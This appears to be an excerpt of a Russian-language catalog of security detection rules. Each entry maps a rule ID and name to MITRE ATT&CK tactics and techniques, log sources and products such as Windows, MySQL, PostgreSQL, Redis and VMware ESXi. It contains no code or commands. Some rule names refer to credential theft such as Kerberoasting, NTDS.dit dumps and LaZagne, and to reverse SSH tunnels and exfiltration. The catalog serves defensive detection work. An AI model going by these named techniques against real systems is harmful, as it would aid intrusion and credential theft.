T1218 (System Binary Proxy Execution), T1218.013 (System Binary Proxy Execution: Mavinject)

Security, Sysmon

Microsoft

Windows

RV-D-596

Запуск множества подозрительных команд

TA0007 (Discovery)

T1018 (Remote System Discovery), T1046 (Network Service Discovery), T1047 (Windows Management Instrumentation), T1049 (System Network Connections Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account), T1124 (System Time Discovery), T1482 (Domain Trust Discovery)

Security, Sysmon

Microsoft

Windows

RV-D-597

Очистка истории команда PowerShell в Windows

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-598

Атака Kerberoasting

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)

Security, Sysmon

Microsoft

Windows

RV-D-599

Закрепление через Office Template Macros

TA0003 (Persistence), TA0005 (Defense Evasion)

T1112 (Modify Registry), T1137 (Office Application Startup), T1137.001 (Office Application Startup: Office Template Macros)

Sysmon

Microsoft

Windows

RV-D-600

Закрепление через Office Test

TA0003 (Persistence), TA0005 (Defense Evasion)

T1112 (Modify Registry), T1137 (Office Application Startup), T1137.001 (Office Application Startup: Office Template Macros)

Sysmon

Microsoft

Windows

RV-D-601

Закрепление через Outlook Home Page

TA0003 (Persistence)

T1137 (Office Application Startup), T1137.004 (Office Application Startup: Outlook Home Page)

Security, Sysmon

Microsoft

Windows

RV-D-602

Закрепление через Microsoft Office Add-ins

TA0003 (Persistence)

T1137 (Office Application Startup), T1137.006 (Office Application Startup: Add-ins)

Sysmon

Microsoft

Windows

RV-D-603

Обнаружение компиляции исходного кода на Windows

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.004 (Obfuscated Files or Information: Compile After Delivery)

Security, Sysmon

Microsoft

Windows

RV-D-604

Скрытие файла через attrib.exe

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Security, Sysmon

Microsoft

Windows

RV-D-605

Запуск PowerShell окна в скрытом режиме

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.003 (Hide Artifacts: Hidden Window)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-606

Сокрытие данных в атрибутах файлов NTFS

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes)

Sysmon, PowerShell

Microsoft

Windows

RV-D-607

Удаление временных RDP файлов в Windows

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-608

Удаление истории RDP подключений через реестр

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations)

Security, Sysmon

Microsoft

Windows

RV-D-617

Запуск MSBuild для выполнения кода

TA0005 (Defense Evasion)

T1127 (Trusted Developer Utilities Proxy Execution), T1127.001 (Trusted Developer Utilities Proxy Execution: MSBuild)

Security, Sysmon

Microsoft

Windows

RV-D-628

Изменение атрибута для скрытия файла через PowerShell

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-629

Удаленная эксплуатация DCOM объекта IMsiServer

TA0008 (Lateral Movement), TA0005 (Defense Evasion)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model), T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)

Sysmon

Microsoft

Windows

RV-D-631

Создание токена и имперсонация учетной записи

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.002 (Access Token Manipulation: Create Process with Token)

Sysmon

Microsoft

Windows

RV-D-648

Остановка критичных сервисов

TA0040 (Impact)

T1489 (Service Stop)

System

Microsoft

Windows

RV-D-659

Запуск процесса от другого пользователя

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.002 (Access Token Manipulation: Create Process with Token)

Security, Sysmon

Microsoft

Windows

RV-D-660

Подмена PID родительского процесса

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.004 (Access Token Manipulation: Parent PID Spoofing)

Sysmon

Microsoft

Windows

RV-D-661

Изменение SID-History

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.005 (Access Token Manipulation: SID-History Injection)

Security

Microsoft

Windows

RV-D-662

Эксплуатация Mark-of-the-Web bypass

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass)

Sysmon

Microsoft

Windows

RV-D-663

Удаленное выполнение команд с помощью PsExec

TA0003 (Persistence), TA0008 (Lateral Movement), TA0002 (Execution)

Security

Microsoft

Windows

RV-D-678

Добавление расширения в браузер средством CLI

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Security, Sysmon

Microsoft

Windows

RV-D-687

Добавление файла в директорию расширения браузера

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Security, Sysmon

Microsoft

Windows

RV-D-713

Утечка NTLM через library-ms (CVE-2025-24071)

TA0006 (Credential Access)

T1187 (Forced Authentication), T1557 (Adversary-in-the-Middle), T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay)

Sysmon

Microsoft

Windows

RV-D-715

Использование средств виртуализации

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.006 (Hide Artifacts: Run Virtual Instance)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-725

Сжатие файлов средствами PowerShell

TA0009 (Collection)

T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)

PowerShell

Microsoft

Windows

RV-D-726

Прямой доступ к диску через PowerShell

TA0005 (Defense Evasion)

T1006 (Direct Volume Access)

PowerShell

Microsoft

Windows

RV-D-727

Изменение доверительных отношений между доменами

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.002 (Domain or Tenant Policy Modification: Trust Modification)

Security

Microsoft

Windows

RV-D-728

Обнаружение эксплуатации DDE через Office

TA0002 (Execution)

T1559 (Inter-Process Communication), T1559.002 (Inter-Process Communication: Dynamic Data Exchange)

Sysmon

Microsoft

Windows

RV-D-729

Обход UAC через COM-объекты

TA0002 (Execution), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control), T1559 (Inter-Process Communication), T1559.001 (Inter-Process Communication: Component Object Model)

Sysmon

Microsoft

Windows

RV-D-731

Использование ssh.exe для кражи NTLM-хэша

TA0006 (Credential Access)

T1187 (Forced Authentication)

Security, Sysmon

Microsoft

Windows

RV-D-732

Запуск ssh.exe с подозрительными параметрами

TA0005 (Defense Evasion)

T1202 (Indirect Command Execution), T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-733

Создание обратного туннеля через ssh.exe

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-739

Подозрительные DNS-запросы к localtoNet домену

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Sysmon

Microsoft

Windows

RV-D-759

Эксфильтрация данных через finger.exe

TA0010 (Exfiltration), TA0011 (Command and Control)

T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-764

Эксплуатация утилиты LaZagne

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1003.004 (OS Credential Dumping: LSA Secrets), T1003.005 (OS Credential Dumping: Cached Domain Credentials), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files), T1555 (Credentials from Password Stores), T1555.001 (Credentials from Password Stores: Keychain), T1555.003 (Credentials from Password Stores: Credentials from Web Browsers), T1555.004 (Credentials from Password Stores: Windows Credential Manager)

Sysmon

Microsoft

Windows

RV-D-767

Создание дампа NTDS.dit

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.003(OS Credential Dumping: NTDS)

Sysmon

OpenVPN

OpenVPN Access Server

RV-D-670

Подключение OpenVPN за пределами России

TA0001 (Initial Access)

T1078 (Valid Accounts), T1133 (External Remote Services)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-671

Подбор пароля в веб-консоль OpenVPN AS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-672

Успешный подбор пароля клиента OpenVPN

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-673

Подбор пароля клиента OpenVPN

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-674

Аномальный HTTP-запрос к webUI Access Server

TA0001 (Initial Access)

T1078 (Valid Accounts), T1133 (External Remote Services)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-675

Множество неуспешных HTTP-запросов к OpenVPN AS

TA0043 (Reconnaissance)

T1190 (Exploit Public-Facing Application), T1595.003 (Active Scanning: Wordlist Scanning)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-676

Доступ к файлу с ключами и сертификатами OpenVPN

TA0009 (Collection)

T1074 (Data Staged), T1587 (Develop Capabilities), T1587.003 (Develop Capabilities: Digital Certificates), T1588 (Obtain Capabilities), T1588.004 (Obtain Capabilities: Digital Certificates)

Auditd

OpenVPN

OpenVPN Access Server

RV-D-677

Изменение конфигурации OpenVPN Access Server

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

Auditd

Oracle

MySQL

RV-D-512

Вход привилегированного пользователя в MySQL

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

percona-audit

Oracle

MySQL

RV-D-513

Атака Password Spraying на СУБД MySQL

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

percona-audit

Oracle

MySQL

RV-D-514

Успешный подбор пароля к СУБД MySQL

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

percona-audit

Oracle

MySQL

RV-D-515

Подбор пароля к СУБД MySQL

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

percona-audit

Oracle

MySQL

RV-D-741

Назначение прав администратора MySQL

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1098 (Account Manipulation)

percona-audit

Oracle

MySQL

RV-D-742

Просмотр пользовательских данных MySQL

TA0007 (Discovery), TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account), T1213 (Data from Information Repositories)

percona-audit

Oracle

MySQL

RV-D-743

Массовое удаление таблиц MySQL

TA0040 (Impact)

T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

percona-audit

Oracle

MySQL

RV-D-744

Остановка сессии пользователя в MySQL

TA0040 (Impact)

T1531 (Account Access Removal)

percona-audit

Oracle

MySQL

RV-D-745

Удаление базы данных в MySQL

TA0040 (Impact)

T1485 (Data Destruction)

percona-audit

Oracle

MySQL

RV-D-746

Создание резервной копии MySQL

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)

percona-audit, Auditd

Oracle

MySQL

RV-D-747

Изменение\удаление таблицы аудита MySQL

TA0005 (Defense Evasion), TA0040 (Impact)

T1070 (Indicator Removal), T1070.001 (Indicator Removal: Clear Windows Event Logs), T1562.001 (Impair Defenses: Disable or Modify Tools), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

percona-audit

Oracle

MySQL

RV-D-748

Изменение пароля учетной записи MySQL

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

percona-audit

Oracle

MySQL

RV-D-749

Получение списка подключений к MySQL

TA0007 (Discovery)

T1049 (System Network Connections Discovery)

percona-audit

Oracle

MySQL

RV-D-750

Получение информации о версии MySQL

TA0007 (Discovery)

T1518 (Software Discovery)

percona-audit

Oracle

Oracle Database

RV-D-709

Атака Password Spraying на OracleDB

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Oracle

Oracle Database

RV-D-710

Подбор пароля к СУБД Oracle

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Oracle

Oracle Database

RV-D-711

Манипуляция с учетными данными СУБД Oracle

TA0003 (Persistence)

T1098 (Account Manipulation)

Oracle

Oracle Database

RV-D-712

Получение информации о пользователях СУБД Oracle

TA0007 (Discovery)

T1033 (System Owner/User Discovery)

Oracle

Oracle Database

RV-D-714

Экспорт базы данных Oracle

TA0010 (Exfiltration)

T1020 (Automated Exfiltration)

Auditd

Oracle

Oracle Database

RV-D-719

Успешный подбор пароля к СУБД Oracle

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Oracle

Oracle Database

RV-D-720

Вход привилегированного пользователя в СУБД Oracle

TA0001 (Initial Access)

T1078 (Valid Accounts)

Oracle

Oracle Database

RV-D-721

Поиск информации о структуре в OracleDB

TA0007 (Discovery)

T1082 (System Information Discovery)

Oracle

Oracle Database

RV-D-722

Поиск информации о конфигурации OracleDB

TA0007 (Discovery)

T1082 (System Information Discovery)

Positive Technologies

Network Attack Discovery

RV-D-618

Запрос на репликацию от недоверенного DNS-сервера

TA0043 (Reconnaissance)

T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS), T1590 (Gather Victim Network Information), T1590.002 (Gather Victim Network Information: DNS)

Positive Technologies

Network Attack Discovery

RV-D-619

Попытки получения информации об учетных записях

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

Positive Technologies

Network Attack Discovery

RV-D-620

Обнаружены признаки использования вредоносной утилиты

TA0011 (Command and Control)

T1008 (Fallback Channels), T1021 (Remote Services), T1021.001 (Remote Services: Remote Desktop Protocol), T1029 (Scheduled Transfer), T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1071.002 (Application Layer Protocol: File Transfer Protocols), T1090 (Proxy), T1090.001 (Proxy: Internal Proxy), T1090.003 (Proxy: Multi-hop Proxy), T1102 (Web Service), T1102.003 (Web Service: One-Way Communication), T1104 (Multi-Stage Channels), T1132 (Data Encoding), T1529 (System Shutdown/Reboot), T1550 (Use Alternate Authentication Material), T1573 (Encrypted Channel), T1573.002 (Encrypted Channel: Asymmetric Cryptography), T1665 (Hide Infrastructure)

Positive Technologies

Network Attack Discovery

RV-D-621

Обнаружена попытка эксплуатации уязвимости

TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)

Positive Technologies

Network Attack Discovery

RV-D-622

Атака DCSync

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)

Positive Technologies

Network Attack Discovery

RV-D-623

Атака DCShadow

TA0005 (Defense Evasion)

T1207 (Rogue Domain Controller)

Positive Technologies

Network Attack Discovery

RV-D-624

Подозрительная сетевая активность с одного узла

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Positive Technologies

Network Attack Discovery

RV-D-625

Обнаружен индикатор компрометации - IOC

TA0011 (Command and Control)

T1071 (Application Layer Protocol)

Positive Technologies

Network Attack Discovery

RV-D-626

Подозрительная сетевая активность с нескольких узлов

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Positive Technologies

Network Attack Discovery

RV-D-627

Признаки использования утилиты для туннелирования трафика

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Positive Technologies

PT Application Firewall 3

RV-D-560

Доступ к странице без информации браузера

TA0009 (Collection), TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1119 (Automated Collection), T1589 (Gather Victim Identity Information), T1589.002 (Gather Victim Identity Information: Email Addresses), T1589.003 (Gather Victim Identity Information: Employee Names)

Positive Technologies

PT Application Firewall 3

RV-D-561

Использование устаревшего протокола

TA0005 (Defense Evasion)

T1562.010 (Impair Defenses: Downgrade Attack), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)

Positive Technologies

PT Application Firewall 3

RV-D-562

Атака с отраженной загрузкой файла

TA0001 (Initial Access), TA0011 (Command and Control)

T1105 (Ingress Tool Transfer), T1189 (Drive-by Compromise), T1190 (Exploit Public-Facing Application), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link)

Positive Technologies

PT Application Firewall 3

RV-D-563

Атака на веб-ресурс PT AF

TA0001 (Initial Access), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python), T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Positive Technologies

PT Application Firewall 3

RV-D-564

Попытка эксплуатации уязвимостей

TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application)

Positive Technologies

PT Application Firewall 3

RV-D-565

Потенциальный перебор страниц web-ресурса

TA0043 (Reconnaissance)

T1595 (Active Scanning), T1595.003 (Active Scanning: Wordlist Scanning)

Positive Technologies

PT Application Firewall 3

RV-D-566

Поиск артефактов веб-приложения

TA0043 (Reconnaissance)

T1595 (Active Scanning), T1595.003 (Active Scanning: Wordlist Scanning)

Positive Technologies

PT Application Firewall 3

RV-D-567

Обнаружена атака типа Brute Force

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Positive Technologies

PT Application Firewall 3

RV-D-568

Подбор пароля к форме авторизации

TA0006 (Credential Access)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Positive Technologies

PT Application Firewall 3

RV-D-569

Множество атак на веб-ресурс

TA0001 (Initial Access), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python), T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Positive Technologies

PT Application Firewall 3

RV-D-570

Атака на различные веб-ресурсы

TA0001 (Initial Access), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python), T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Positive Technologies

PT Application Firewall 3

RV-D-571

Использование сканера уязвимостей

TA0001 (Initial Access), TA0043 (Reconnaissance)

T1190 (Exploit Public-Facing Application), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)

PostgreSQL

RV-D-182

Множественные неудачные попытки подключения к базе данных PostgreSQL

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

pgAudit

PostgreSQL

RV-D-183

Обнаружена попытка дампа базы данных или учетных данных PostgreSQL

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Auditd, pgAudit

PostgreSQL

RV-D-184

Атака типа Password Spraying к СУБД PostgreSQL

TA0006 (Credential Access)

T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking)

pgAudit

PostgreSQL

RV-D-185

Успешная атака типа Brute Force к СУБД PostgreSQL

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

pgAudit

PostgreSQL

RV-D-186

Обнаружено изменение параметров аудита базы данных PostgreSQL

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

pgAudit

PostgreSQL

RV-D-187

Возможно, предпринята попытка разведки структуры базы данных PostgreSQL

TA0007 (Discovery)

T1082 (System Information Discovery)

pgAudit

PostgreSQL

RV-D-188

Взаимодействие с файловой системой из базы данных PostgreSQL

TA0007 (Discovery)

T1083 (File and Directory Discovery)

pgAudit

PostgreSQL

RV-D-189

Получение информации о существующих учетных записях в PostgreSQL

TA0007 (Discovery)

T1087 (Account Discovery)

pgAudit

PostgreSQL

RV-D-190

Изменение файла конфигурации базы данных PostgreSQL

TA0040 (Impact)

T1565 (Data Manipulation)

Auditd

PostgreSQL

RV-D-191

Попытка удаления базы данных в PostgreSQL

TA0040 (Impact)

T1485 (Data Destruction)

pgAudit

PostgreSQL

RV-D-192

Вход привилегированного пользователя на СУБД PostgreSQL с неизвестного хоста

TA0003 (Persistence), TA0005 (Defense Evasion)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

pgAudit

PostgreSQL

RV-D-193

Новая учетная запись с правами superuser в PostgreSQL

TA0003 (Persistence)

T1136 (Create Account)

pgAudit

PostgreSQL

RV-D-194

Изменен пароль от учетной записи с правами superuser в PostgreSQL

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

pgAudit

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-195

Подбор пароля к СУБД Redis

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Events of database

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-196

Атака Password Spraying на Redis

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Events of database

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-197

Успешный подбор пароля к Redis

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Events of database

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-198

Вход привилегированного пользователя в Redis

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

Events of database

Redis

Redis Enterprise Software

RV-D-583

Добавление нового модуля в кластер Redis

TA0002 (Execution), TA0008 (Lateral Movement)

T1072 (Software Deployment Tools)

Redis Enterprise Software

Redis

Redis Enterprise Software

RV-D-590

Создание критичной роли в кластере Redis

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1098 (Account Manipulation)

Redis Enterprise Software

Redis

Redis Enterprise Software

RV-D-591

Удаление экземпляра БД Redis

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Redis Enterprise Software

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-592

Создание нового пользователя Redis

TA0003 (Persistence)

T1136 (Create Account), T1136.001 (Create Account: Local Account)

Redis Enterprise Software, Redis Monitor

Redis

Redis Enterprise Software

RV-D-594

Добавление критичной роли пользователю Redis

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1098 (Account Manipulation)

Redis Enterprise Software

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-584

Очистка экземпляра базы данных Redis

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-585

Множественное удаление данных в экземпляре Redis БД

TA0040 (Impact)

T1485 (Data Destruction), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-586

Дамп экземпляра базы данных Redis

TA0009 (Collection)

T1005 (Data from Local System)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-587

Получение информации об экземпляре базы данных Redis

TA0007 (Discovery)

T1082 (System Information Discovery)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-588

Получение информации о существующих пользователях Redis БД

TA0007 (Discovery)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-589

Получение информации о существующих ключах в экземпляре БД Redis

TA0007 (Discovery)

T1082 (System Information Discovery)

Redis Monitor

Redis

Redis Community Edition, Redis Enterprise Software

RV-D-593

Изменение конфигурации экземпляра базы данных Redis

TA0005 (Defense Evasion), TA0040 (Impact)

T1562.001 (Impair Defenses: Disable or Modify Tools), T1565 (Data Manipulation)

Redis Monitor

Usergate

Usergate NGFW

RV-D-208

Соединение с адресом из репутационного списка

TA0011 (Command and Control)

T1102 (Web Service)

Usergate

Usergate NGFW

RV-D-209

Соединение с веб-ресурсом с высоким уровнем критичности

TA0011 (Command and Control)

T1102 (Web Service)

Usergate

Usergate NGFW

RV-D-210

Соединение с веб-ресурсом с низким уровнем критичности

TA0011 (Command and Control)

T1102 (Web Service)

VMware

VMware ESXi

RV-D-226

Изменение аудита виртуальной инфраструктуры

TA0040 (Impact), TA0005 (Defense Evasion)

T1485 (Data Destruction)

hostd.log

VMware

VMware ESXi

RV-D-679

Остановка критичного сервиса ESXi

TA0040 (Impact)

T1489 (Service Stop)

shell.log

VMware

VMware ESXi

RV-D-680

Создание ssh-туннелей на ESXi

TA0011 (Command and Control), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1090 (Proxy), T1572 (Protocol Tunneling)

shell.log

VMware

VMware ESXi

RV-D-681

Использование find в ESXi

TA0002 (Execution), TA0007 (Discovery), TA0009 (Collection)

T1005 (Data from Local System), T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1070 (Indicator Removal), T1070.004 (Indicator Removal: File Deletion), T1083 (File and Directory Discovery)

shell.log

VMware

VMware ESXi

RV-D-682

Использование утилит ESXi через CLI

TA0002 (Execution), TA0003 (Persistence), TA0005 (Defense Evasion), TA0007 (Discovery), TA0008 (Lateral Movement), TA0040 (Impact)

T1016 (System Network Configuration Discovery), T1018 (Remote System Discovery), T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1049 (System Network Connections Discovery), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.012 (Command and Scripting Interpreter: Hypervisor CLI), T1070 (Indicator Removal), T1070.009 (Indicator Removal: Clear Persistence), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1124 (System Time Discovery), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1485 (Data Destruction), T1489 (Service Stop), T1490 (Inhibit System Recovery), T1505 (Server Software Component), T1505.006 (Server Software Component: vSphere Installation Bundles), T1518 (Software Discovery), T1529 (System Shutdown/Reboot), T1561 (Disk Wipe), T1562.001 (Impair Defenses: Disable or Modify Tools), T1562.004 (Impair Defenses: Disable or Modify System Firewall), T1562.006 (Impair Defenses: Indicator Blocking), T1564 (Hide Artifacts), T1564.006 (Hide Artifacts: Run Virtual Instance), T1673 (Virtual Machine Discovery)

shell.log

VMware

VMware ESXi

RV-D-696

Обнаружение уязвимой конфигурации ESXi

TA0002 (Execution), TA0008 (Lateral Movement), TA0001 (Initial Access), TA0005 (Defense Evasion)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1190 (Exploit Public-Facing Application), T1210 (Exploitation of Remote Services), T1562.004 (Impair Defenses: Disable or Modify System Firewall), T1569 (System Services)

shell.log, hostd.log, vobd.log, slpd.log

VMware

VMware ESXi

RV-D-718

Использование chmod в ESXi через CLI

TA0005 (Defense Evasion), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification)

shell.log

VMware

VMware ESXi

RV-D-753

Удаление или отключение логирования команд

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History), T1562.003 (Impair Defenses: Impair Command History Logging)

shell.log

VMware

VMware ESXi

RV-D-754

Доступ к критичным файлам на сервере ESXi

TA0002 (Execution), TA0003 (Persistence)

shell.log

VMware

VMware ESXi

RV-D-760

Маскировка через переименование/подмену index.html

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.005 (Masquerading: Match Legitimate Resource Name or Location)

shell.log

VMware

VMware ESXi

RV-D-761

Изменение меток времени через touch

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.006 (Indicator Removal: Timestomp)

shell.log

VMware

VMware ESXi

RV-D-765

Лишение пользователя доступа к ESXi

TA0040 (Impact)

T1531 (Account Access Removal)

hostd.log

VMware

VMware ESXi, VMware vCenter

RV-D-211

Множественные неуспешные попытки аутентификации пользователя

